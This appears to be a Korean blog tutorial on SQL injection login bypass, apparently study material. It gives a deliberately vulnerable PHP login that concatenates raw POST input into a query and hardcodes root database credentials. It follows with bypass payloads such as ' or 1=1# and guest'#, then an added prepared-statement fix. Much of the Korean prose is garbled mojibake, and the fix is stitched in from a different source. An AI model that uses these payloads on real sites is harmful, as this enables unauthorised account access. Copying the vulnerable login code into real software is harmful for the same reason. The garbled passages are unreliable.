์ƒˆ์†Œ์‹

์ธ๊ธฐ ๊ฒ€์ƒ‰์–ด

๐Ÿ“  Secure

SQL Injection ์ธ์ฆ ์šฐํšŒ

Server-side code is delimited as follows:

<@
	JSP code
@>

<?
	PHP code
?>
// index.php
<?php
    @session_start(); // handle the session in PHP
    header("Content-Type: text/html; charset=utf-8");

    // If the session has no id, show an alert and send the user to the login page
    if(empty($_SESSION["id"])){
        echo "<script>alert('로그인이 필요합니다');
        location.href='login.php';
        </script>";
        exit();
    }

    // $var = 1;    // variables are declared with the $ sign
    // $test = 'test';
    // echo $test;  // prints test
?>

<h1>회원 전용 페이지 입니다. </h1>
<!-- read the session variable -->
<p> <?=$_SESSION["id"]?>님 반갑습니다.</p>
<input type="button" onclick="location.href='logout.php'" value="logout">

// login.php
<?php
    @session_start(); // handle the session in PHP
    header("Content-Type: text/html; charset=utf-8");
?>
<h2> 로그인 페이지입니다. </h2>
<form action="loginAction.php" method="POST">
    <ul>
        <li>ID : <input type="text" name="id"></li>
        <li>PW : <input type="password" name="pw"></li>
    </ul>
    <input type="submit" value="login">
</form>

// loginAction.php
<?php
    @session_start(); // handle the session in PHP
    header("Content-Type: text/html; charset=utf-8");

    $db_conn = new mysqli("localhost","root","apmsetup","login");    // new mysqli(host, user name, pw, database to use)

    $id = $_POST["id"];
    $pw = $_POST["pw"];

    // User input is concatenated straight into the SQL string: this is the injection point
    $query = "SELECT * FROM member WHERE id='{$id}' and pw='{$pw}'";
    $tmp = $db_conn->query($query); // send the query to the database
    $cnt = $tmp->num_rows;          // count the returned records
    $user = $tmp->fetch_assoc();    // put the first result row into $user

    if($cnt == 0){
        echo "<script>alert('ID 혹은 PW가 잘못 되었습니다');
                history.back();
              </script>";
        exit();
    }
    $_SESSION["id"] = $user["id"];
    echo "<script>location.href='index.php';
          </script>";
?>

// logout.php
<?php
    @session_start(); // handle the session in PHP
    header("Content-Type: text/html; charset=utf-8");
    session_destroy();

    echo "<script>
            location.href='login.php'
          </script>";
?>
์ธ์ฆ ์šฐํšŒ ๊ณต๊ฒฉ

์ธ์ฆ ๊ธฐ๋Šฅ์„ ์ˆ˜ํ–‰ํ•˜๋Š” ์›น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ [ ์„œ๋ฒ„ ์›นํŽ˜์ด์ง€ ]์— ๋Œ€ํ•ด

SQL๊ตฌ๋ฌธ[' or 1=1#]์„ ์‚ฝ์ž…ํ•จ์œผ๋กœ์จ ์ •์ƒ์ ์ธ ์ธ์ฆ ์—†์ด ์ ‘๊ทผํ•˜๋Š” ์ทจ์•ฝ์ 

 

๋กœ๊ทธ์ธ ๊ณต๊ฒฉ

SELECT * FROM member WHERE id='์ž…๋ ฅ ๊ฐ’' AND pw='์ž…๋ ฅ ๊ฐ’'

1. ์œ„ ๊ตฌ๋ฌธ์— ์‚ฌ์šฉ์ž ์ž…๋ ฅ๊ฐ’์„ ๋„ฃ๋Š”๋‹ค.

2. ํ•ด๋‹น ์ฟผ๋ฆฌ๊ฐ€ ๊ฒฐ๊ณผ๋ฅผ ๋ฐ˜ํ™˜ํ•˜๋Š”๋ฐ

2-1. ๋ ˆ์ฝ”๋“œ๊ฐ€ 0๊ฐœ ์ถœ๋ ฅ๋œ๋‹ค > ID์™€ PW๊ฐ€ ์ผ์น˜ํ•˜์ง€์•Š๋Š”๋‹ค.

2-2. ๋ ˆ์ฝ”๋“œ๊ฐ€ 1๊ฐœ ์ถœ๋ ฅ๋œ๋‹ค > ID์™€ PW๊ฐ€ ์ผ์น˜ํ•œ๋‹ค.

ํ•ต์‹ฌ : ๋ ˆ์ฝ”๋“œ๋ฅผ ์ถœ๋ ฅ์‹œํ‚ฌ ์ˆ˜ ์žˆ๋Š๋ƒ ์—†๋Š๋ƒ

 

์ •์ƒ์ ์œผ๋กœ admin์œผ๋กœ ์ ‘์†
์ธ์ฆ ์šฐํšŒ ๊ณต๊ฒฉ์‹œ ๋ณด์ด๋Š” ์•Œ๊ณ ๋ฆฌ์ฆ˜

์ธ์ฆ ์šฐํšŒ๋ฅผ ํ•˜๊ฒŒ ๋˜๋ฉด ์ตœ ์ƒ์œ„ ์•„์ด๋””๋ฅผ ๋ฝ‘์•„๋‚ธ๋‹ค.

๊ทธ๋ ‡๋‹ค๋ฉด Guest๋กœ ์ธ์ฆ์šฐํšŒ ๋กœ๊ทธ์ธ ํ•˜๋Š”๋ฒ•์€ ?

Guest๋กœ ๋œ ๋ ˆ์ฝ”๋“œ๋ฅผ ์ถœ๋ ฅํ•˜๊ธฐ๋งŒ ํ•˜๋ฉด ๋œ๋‹ค == Guest๊ฐ€ ์ตœ์ƒ๋‹จ์ด๋ฉด ๋œ๋‹ค.

SELECT * FROM member WHERE id='guest'#' and pw=''

SELECT * FROM tb_board WHERE idx=6 and password='๊ฑฐ์ง“' or 1=1 #

SELECT * FROM tb_board WHERE password='๊ฑฐ์ง“' or 1=1 #

SELECT * FROM tb_board WHERE 1 #

> ๋ชจ๋“  tb_board ์ถœ๋ ฅ > ๊ทธ์ค‘ ์ตœ์ƒ๋‹จ 1๋ฒˆ ํ…Œ์ด๋ธ” ์ถœ๋ ฅ

SELECT * FROM tb_board WHERE [idx=6 and password='๊ฑฐ์ง“'] or 1=1 #

SELECT * FROM tb_board WHERE '๊ฑฐ์ง“' or [1=1 and idx=6]

' or 1=1 and idx=6 #
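Both the login attack above and the "top row becomes the session identity" behaviour come from the same defect in loginAction.php: the WHERE clause is assembled from raw POST data and the first returned row is trusted. The following is an added example, not code from the original post, showing the same handler rewritten with a mysqli prepared statement and password_verify(). It assumes the member table has a pw_hash column holding password_hash() digests instead of the plaintext pw column, and the database credentials are placeholders.

```php
<?php
// loginAction.php, hardened version (added example; assumptions noted inline).
@session_start();
header("Content-Type: text/html; charset=utf-8");

// Surface driver errors as exceptions instead of silently returning false.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
// Placeholder credentials: replace with the real DB user and password.
$db_conn = new mysqli("localhost", "DB_USER_PLACEHOLDER", "DB_PASSWORD_PLACEHOLDER", "login");
$db_conn->set_charset("utf8mb4");

$id = $_POST["id"] ?? "";
$pw = $_POST["pw"] ?? "";

/**
 * Look up the member row for $id and verify $pw against the stored hash.
 * The id is bound as a parameter, so the quote and '#' in a payload such as
 * ' or 1=1# are compared literally against the id column and never reach
 * the SQL parser as syntax. Returns the member id on success, null otherwise.
 * Assumes a pw_hash column created with password_hash().
 */
function authenticate(mysqli $db, string $id, string $pw): ?string
{
    // Only the id takes part in the WHERE clause; the password is checked
    // in PHP against the hash, never compared inside SQL.
    $stmt = $db->prepare("SELECT id, pw_hash FROM member WHERE id = ?");
    $stmt->bind_param("s", $id);
    $stmt->execute();
    $result = $stmt->get_result(); // requires the mysqlnd driver

    // Exactly one row is expected. Ids are unique, so "first row of many"
    // (the admin/guest ordering trick above) cannot decide who logs in.
    if ($result->num_rows !== 1) {
        return null;
    }
    $user = $result->fetch_assoc();
    if (!password_verify($pw, $user["pw_hash"])) {
        return null;
    }
    return $user["id"];
}

$member = authenticate($db_conn, $id, $pw);
if ($member === null) {
    echo "<script>alert('ID 혹은 PW가 잘못 되었습니다'); history.back();</script>";
    exit();
}

// Issue a fresh session id when the privilege level changes (login),
// then store the id that was actually verified, not whatever row came first.
session_regenerate_id(true);
$_SESSION["id"] = $member;
header("Location: index.php");
exit();
```

With the id bound as a parameter the injected characters are plain data, and the num_rows check rejects anything other than a single matching row, so the identity written into the session is always the row for the id that was typed, never the top row of a table scan.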

๋ฐ˜์‘ํ˜•

'๐Ÿ“  Secure' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

SQL Injection ์‹ค์Šต  (0) 2022.07.08
CODE Injection  (0) 2022.07.07
SQL Injection - Error Based  (0) 2022.07.06
Oracle Blind Based  (0) 2022.07.06
ORACLE Union Based  (0) 2022.07.06
Contents

ํฌ์ŠคํŒ… ์ฃผ์†Œ๋ฅผ ๋ณต์‚ฌํ–ˆ์Šต๋‹ˆ๋‹ค

์ด ๊ธ€์ด ๋„์›€์ด ๋˜์—ˆ๋‹ค๋ฉด ๊ณต๊ฐ ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.